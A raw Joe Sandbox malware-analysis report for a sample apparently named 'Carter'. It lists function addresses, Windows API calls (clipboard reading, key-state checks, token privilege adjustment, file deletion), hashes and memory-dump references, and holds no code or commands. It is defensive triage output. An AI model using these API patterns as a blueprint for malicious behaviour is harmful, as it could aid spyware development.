Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Exception@8Throw_memsetstd::exception::exception
String ID:
API String ID: 525207782-0
Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
Instruction ID: 378b7aae551a4ce7a63242cd33da9c6cfa05379343598904b9379ae5524e5a37
Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
Instruction Fuzzy Hash: 380119752082019FD321EF5CDA41F09BBE5AF5A310F24C45AF5888B392DB72E800CF90

Function 00A94A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00A94AA4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 111d26a99ba254541999d008f2d7b63d59a38e2d833a3e5e3b333ec85e0f3e30
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 7EF085B6900208BFDF108F94DC04DEBBBBEEF89320F004198F9045B210D232EA218BA0

Function 00A94A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00A927AF,?,00000001), ref: 00A94A63

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9ae7015910e87c04e8215fb8ea3407147ed44a56fc48eba4ca61acb12c051203
Instruction ID: 80acbb29bde2e724c9fd8af4ddfe815b69784feff800fdf2239a0ef0bb85510f
Opcode Fuzzy Hash: 9ae7015910e87c04e8215fb8ea3407147ed44a56fc48eba4ca61acb12c051203
Instruction Fuzzy Hash: EEF01571645702CFCF349F68E890C1ABBF0AF183693208A2EE1D683A10C7319984DB48

Function 00A94AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00A94AD0

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: f5d1cf88ad4701d6505689c4cdd9b02b783a64dcb2e08a2128286804a26ca5d1
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: 1EF0FE7150010DFFDF05CF90C941EAA7BB9FB19314F108589F9154B251D336DA21AB91

Function 00AA09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AA09E4

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 2b0684b30d22d6ccf35d52289e8c8aa55b90ee3c71b07a68b3c6209116a8fa3e
Instruction ID: d53bfdf15d4f0b9c29b79626606486a5a269dabebfa8db58de4dce5339236fac
Opcode Fuzzy Hash: 2b0684b30d22d6ccf35d52289e8c8aa55b90ee3c71b07a68b3c6209116a8fa3e
Instruction Fuzzy Hash: 90E08632A0012857CB21A6989C15FEA77DDDB89690F0441B6FC09D7205D9649C818691

Function 00AE4D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00AE4D31

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: 25a4a9c9c2c3edf6f897ab2140deb7d782a2f38fda20d0d1a1105a3e8808b025
Instruction ID: 058504ee329e1b6ea1417c6be52e765e3b6e51ecba8848ba248fce0a22fca49e
Opcode Fuzzy Hash: 25a4a9c9c2c3edf6f897ab2140deb7d782a2f38fda20d0d1a1105a3e8808b025
Instruction Fuzzy Hash: 76D05EA191032C2BDF60E6A49C4DDF77BACD744220F004AA17C5DC3201ED649D8586E0

Function 00AE394D Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00AE3959,00000000,00000000,?,00AD05DB,00B38070,00000002,?,?), ref: 00AE38CA

WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00AD05DB,00B38070,00000002,?,?,?,00000000), ref: 00AE3967

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 48c26b4d6d3c76bb2fce32298c66a83a329b923533751280feb823b38c5f6334
Instruction ID: 80909e5342a4b0f6a59f9f7e6caaddb7bb24663887b003165bd5904ea9229fc7
Opcode Fuzzy Hash: 48c26b4d6d3c76bb2fce32298c66a83a329b923533751280feb823b38c5f6334
Instruction Fuzzy Hash: 70E04636410208BBDB20AF94D805ADABBBCEB04320F00465AFD4092111DBB2AE249BA0

Function 00AE3EF7 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00AE3E7D,?,?,?), ref: 00AE3F0D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 19dea65157466de2f4a28cbcf52a23ea65cba4dc80edfa283f670791c904db7e
Instruction ID: b7dff1d0132427ed9001093da6090c0a891256a9ff64927d558ac2f8a99036c4
Opcode Fuzzy Hash: 19dea65157466de2f4a28cbcf52a23ea65cba4dc80edfa283f670791c904db7e
Instruction Fuzzy Hash: 3ED0A7315E020CFBEF50DFA0CC06FA8B7ACE701706F1002A4B504DA0E0DAB269149795

Function 00A942AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00AD06E6,00000000,00000000,00000000), ref: 00A942BF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3a12be7279665c7582be239ebc77113240a3ae1c9c57ef3a34b4eaaf678b49d0
Instruction ID: 3efcad15fc77a68d808b8fee9489afd583f84db827802e9ef72b6292a60756e4
Opcode Fuzzy Hash: 3a12be7279665c7582be239ebc77113240a3ae1c9c57ef3a34b4eaaf678b49d0
Instruction Fuzzy Hash: 9FD0C77465020CBFE710DB80DC46FA9777CE705710F500194FD04A7290D6F27D508795

Function 00AE4FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 59889acb79ad1f1d202264b3c698c0ac49d61f55ebe38878e4a4d04ae9eb1242
Instruction ID: 5c7a99cd2f07ca23f7313d6381f969afd1ec1037681a2214d3d58ee2be4aa052
Opcode Fuzzy Hash: 59889acb79ad1f1d202264b3c698c0ac49d61f55ebe38878e4a4d04ae9eb1242
Instruction Fuzzy Hash: 15B09234010680669D282F3D19480993309584AFA97D81B81E878964E1D6398C9BA620

Function 00AA547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00AA5486

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: d6de6d45c2de5ddde6210d01d3a8bb494f2b3a1d0042ca9c7e7816ab69a623c1
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 1BB0927684020CB7CE012A92EC03A593F2A9B45668F408020FB0C1D1A2A673A6A09689

Function 00AED6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00AED842

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7550610b8ff722b4929b1d27947fa7d7ce95eb71a37aea3191ca0544f7b9e45d
Instruction ID: 588e455019eb99e0565d97d8f480aaf83ecdab010a75476c8026eaee5559b3ea
Opcode Fuzzy Hash: 7550610b8ff722b4929b1d27947fa7d7ce95eb71a37aea3191ca0544f7b9e45d
Instruction Fuzzy Hash: B07172312043428FCB14EF69D591A6EB7F1AF89354F44462DF8969B3A2DB30ED05CB52

Function 00AEC270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00AE4005: FindFirstFileW.KERNEL32(?,?), ref: 00AE407C
Part of subcall function 00AE4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00AE40CC
Part of subcall function 00AE4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00AE40DD
Part of subcall function 00AE4005: FindClose.KERNEL32(00000000), ref: 00AE40F4

GetLastError.KERNEL32 ref: 00AEC292

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 6a701b823c39c168b2c16dc61a78a77f5e628669447dac13a6277959483e7517
Instruction ID: 5528a1b425f8e984cd7aeb058abd1cc296c5ac1500cf37031647d98e1c3bd0dc
Opcode Fuzzy Hash: 6a701b823c39c168b2c16dc61a78a77f5e628669447dac13a6277959483e7517
Instruction Fuzzy Hash: 90F082312101104FCB10FF59D950B59B7E5AF48320F058419F9058B352CB74BC01CB94

Function 00A942CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,00AC2F8B), ref: 00A942EF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a19e67afce6349a3b7c7e9e49b41df41f17bc301c49ede830518798bf6b06166
Instruction ID: b456a6f92970c8e3c8cdc4339a06a00f5c7fa80290e953198b577721e2005106
Opcode Fuzzy Hash: a19e67afce6349a3b7c7e9e49b41df41f17bc301c49ede830518798bf6b06166
Instruction Fuzzy Hash: C7E0B675504B01CFC7314F1AE804892FBF8FFE93713214A2EE0E692660E7B0589ACB50

Non-executed Functions

Function 00B0D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B0D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B0D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0D2B8
SendMessageW.USER32 ref: 00B0D2E1
_wcsncpy.LIBCMT ref: 00B0D359
GetKeyState.USER32(00000011), ref: 00B0D37A
GetKeyState.USER32(00000009), ref: 00B0D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0D39D
GetKeyState.USER32(00000010), ref: 00B0D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0D3D0
SendMessageW.USER32 ref: 00B0D3F7
SendMessageW.USER32(?,00001030,?,00B0B9BA), ref: 00B0D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B0D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B0D526
SetCapture.USER32(?), ref: 00B0D52F
ClientToScreen.USER32(?,?), ref: 00B0D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B0D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B0D5BB
ReleaseCapture.USER32 ref: 00B0D5C6
GetCursorPos.USER32(?), ref: 00B0D600
ScreenToClient.USER32(?,?), ref: 00B0D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0D669
SendMessageW.USER32 ref: 00B0D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0D6D4
SendMessageW.USER32 ref: 00B0D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B0D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B0D733
GetCursorPos.USER32(?), ref: 00B0D753
ScreenToClient.USER32(?,?), ref: 00B0D760
GetParent.USER32(?), ref: 00B0D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0D7E9
SendMessageW.USER32 ref: 00B0D81A
ClientToScreen.USER32(?,?), ref: 00B0D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B0D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0D8D2
SendMessageW.USER32 ref: 00B0D8F5
ClientToScreen.USER32(?,?), ref: 00B0D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B0D97B

Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC

GetWindowLongW.USER32(?,000000F0), ref: 00B0DA17

Strings

F, xrefs: 00B0D8FB
@GUI_DRAGID, xrefs: 00B0D562

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 1a5928f4b1d00cced863c5f5da6f3c3cc8b14150aa4660c4805eb65e16fb5368
Instruction ID: 5546b940ad849119a175da31937fd9bc43fc1b19de6ac12d745db6b131f3aeba
Opcode Fuzzy Hash: 1a5928f4b1d00cced863c5f5da6f3c3cc8b14150aa4660c4805eb65e16fb5368
Instruction Fuzzy Hash: F8429C34208341AFD720DFA8C884BAABFE5FF89310F144699F695972E0CB719D55CB92

Function 00AD8F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00AD9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
Part of subcall function 00AD9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
Part of subcall function 00AD9399: GetLastError.KERNEL32 ref: 00AD941D

_memset.LIBCMT ref: 00AD8F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AD8FC3
CloseHandle.KERNEL32(?), ref: 00AD8FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AD8FEB
GetProcessWindowStation.USER32 ref: 00AD9004
SetProcessWindowStation.USER32(00000000), ref: 00AD900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AD9028

Part of subcall function 00AD8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AD8F27), ref: 00AD8DFE
Part of subcall function 00AD8DE9: CloseHandle.KERNEL32(?,?,00AD8F27), ref: 00AD8E10

Strings

, xrefs: 00AD8F80
default, xrefs: 00AD9023
winsta0, xrefs: 00AD8FE6

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 79ebb23a6f589bfaab99d2c65ff81f105633b4e6bde4d0fd3b0665e1af3839d0
Instruction ID: 5c47f9dc3cb9f6b98aed8cf64ade4648265de9fc25772cb8096d7465246df121
Opcode Fuzzy Hash: 79ebb23a6f589bfaab99d2c65ff81f105633b4e6bde4d0fd3b0665e1af3839d0
Instruction Fuzzy Hash: E4816A71900209BFDF51EFA4CD49AEF7B79BF08304F04825AF916A62A1DB718E55DB20

Function 00AF4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00B10980), ref: 00AF465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00AF466A
GetClipboardData.USER32(0000000D), ref: 00AF4672
CloseClipboard.USER32 ref: 00AF467E
GlobalLock.KERNEL32(00000000), ref: 00AF469A
CloseClipboard.USER32 ref: 00AF46A4
GlobalUnlock.KERNEL32(00000000), ref: 00AF46B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00AF46C6
GetClipboardData.USER32(00000001), ref: 00AF46CE
GlobalLock.KERNEL32(00000000), ref: 00AF46DB
GlobalUnlock.KERNEL32(00000000), ref: 00AF470F
CloseClipboard.USER32 ref: 00AF481F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 8be1e80bba5744ca091f5186625e02c5340d35c3a69a040fb8880177f2e69b41
Instruction ID: e71e18f3101d6eea935697294bee18b019bee378737219a6774954d2b304eeca
Opcode Fuzzy Hash: 8be1e80bba5744ca091f5186625e02c5340d35c3a69a040fb8880177f2e69b41
Instruction Fuzzy Hash: FD518171244206ABD700FFA0DD89FBF77A8AF98B51F404529F646D31A1DFB0D9448BA2

Function 00AECD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00AECDD0
FindClose.KERNEL32(00000000), ref: 00AECE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AECE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AECE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 00AECE87
